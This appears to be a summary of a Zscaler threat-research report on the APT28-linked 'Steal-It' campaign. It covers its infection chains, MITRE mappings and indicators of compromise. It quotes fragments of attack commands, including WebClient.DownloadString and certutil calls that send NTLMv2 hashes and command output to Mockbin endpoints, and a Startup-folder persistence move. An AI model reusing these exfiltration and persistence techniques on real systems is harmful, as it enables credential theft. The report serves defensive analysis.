Threat Research

Steal-It Campaign

ZScaler

Zscaler ThreatLabz describes the “Steal-It” campaign, which uses malicious LNK files in ZIP archives to deploy customized Nishang-based PowerShell and batch scripts that capture NTLMv2 hashes and system command output, then exfiltrate the data to Mockbin/Mocky endpoints. The campaign includes geofencing (targeting Australia, Poland, Belgium), persistence via the Startup folder, and TTPs consistent with APT28. #NTLMv2 #Mockbin

Keypoints

  • Initial delivery uses ZIP archives containing malicious LNK shortcuts that open browser-based payloads or download scripts.
  • NTLMv2 hashes are captured via a modified Nishang Start-CaptureServer PowerShell script and exfiltrated to Mockbin endpoints.
  • System information and command outputs (ipconfig, systeminfo, tasklist, whoami) are collected, base64-encoded, and sent to Mockbin/Mocky URLs.
  • Multiple infection chains (NTLMv2 steal, SystemInfo steal, Fansly whoami exfil, Windows Update exfil) employ geofencing to target AU, PL, and BE selectively.
  • Persistence is achieved by moving downloaded LNK/CMD/BAT files into the user Startup folder so they execute on reboot.
  • Exfiltration methods include WebClient.DownloadString/UploadString and certutil URL requests to Mockbin endpoints; payloads are stripped of comments/strings to evade detection.
  • Zscaler links the campaign to APT28 based on overlapping scripts, Mockbin usage, and the “Windows Update” theme observed in prior CERT‑UA reporting.

MITRE Techniques

  • [T1598] Phishing – Initial delivery via archive and shortcut lures to trick users into executing payloads. (‘ZIP archive bundled with a malicious LNK (shortcut) file’)
  • [T1059] Command and Scripting Interpreter – Use of PowerShell, batch (.cmd/.bat), and JavaScript to download, decode, and execute stages. (‘downloads another PowerShell script’ / ‘JavaScript one liner redirecting to the http://run[.]mocky[.]io/v3/<id> URL’)
  • [T1212] Exploitation for Credential Access – Capturing NTLMv2 hashes via a customized Start-CaptureServer script to harvest credentials. (‘capture NTLMv2 hashes’ / ‘customized version of Nishang’s Start-CaptureServer PowerShell script’)
  • [T1567] Exfiltration Over Web Service – Stolen hashes and command outputs are exfiltrated to Mockbin/Mocky endpoints using HTTP GET/POST and certutil requests. (‘exfiltrated via mock APIs’ / ‘Net.WebClient.DownloadString(…) https[:]//mockbin.org/bin/<id>’)
  • [T1037] Startup Items – Achieves persistence by moving downloaded LNK/BAT/CMD files into the Startup folder to run at reboot. (‘move /y %userprofile%Downloadsm8 m8.lnk’ / ‘copied into the Startup folder’)

Indicators of Compromise

  • [LNK file hashes] Malicious shortcut samples used as the initial vector – 022d01e7007971f5a5096c4f2f2b2aa4, 1e2a320658ba5b616eae7a3e247f44a6 (and other LNK hashes)
  • [PowerShell / script hash] Modified Nishang Start-CaptureServer script – script: 358d9271b8e207e82dafe6ea67c1d198 (used to capture NTLMv2)
  • [Mockbin / Mocky URLs] Exfiltration and stage hosting endpoints – https[:]//mockbin.org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e, https[:]//run.mocky.io/v3/869e530a-51f7-4bec-ae6e-3effb1737691 (and additional run[.]mocky[.]io/mockbin URLs)
  • [Webhook / staging URLs] Alternate hosting used for downloads – https[:]//webhook[.]site/33128548-0eda-4e2b-bf89-7b1b225ecb9f
  • [File names] Notable stage/persist filenames seen in chains – best_tits.zip, onlyfans.com-1.lnk, m8.lnk / m8.cmd (used for persistence and final payload execution)

The technical flow across the Steal‑It infection chains begins with user‑facing ZIP archives that include malicious LNK shortcuts. Those LNKs either launch a browser to a run[.]mocky[.]io HTML page (which runs geofencing JavaScript and decodes a staged payload) or directly invoke PowerShell to download scripts from mockbin/webhook endpoints. One major variant uses a customized Nishang Start‑CaptureServer PowerShell script stripped of comments and detectable strings; it captures base64 NTLMv2 hashes and sends them via Net.WebClient.DownloadString() to https://mockbin.org/bin/<id> for remote collection.

Another variant (SystemInfo/Fansly) decodes and drops LNK/CMD/BAT files into Downloads, then moves them into the Startup folder to ensure persistence. The final scripts execute commands (ipconfig, systeminfo, tasklist, whoami), store outputs in ProgramData, base64‑encode them (CertUtil), set environment variables, and exfiltrate results by issuing HTTP requests to Mockbin endpoints (certutil -urlcache GET patterns or WebClient.UploadString POSTs). The Fansly chain uses explicit images as lures and sets an env var (dobpyk) for the whoami output before calling mockbin.org/bin/<id>/<cmd_output> to transmit the data.

The Windows Update themed chain targets Belgium and mirrors these techniques: LNK → run[.]mocky[.]io → decoded batch (c1.bat/b4.cmd) placed in Startup, followed by PowerShell stages that run tasklist/systeminfo and exfiltrate results via WebClient.UploadString() to mockbin[.]org; file‑listing commands (Get-ChildItem … | select FullName) were also observed being exfiltrated. Across all chains the operator uses geofencing checks in JavaScript, staged base64 blobs for payload delivery, and HTTP-based mock endpoints for both hosting and covert exfiltration.

Read more: https://www.zscaler.com/blogs/security-research/steal-it-campaign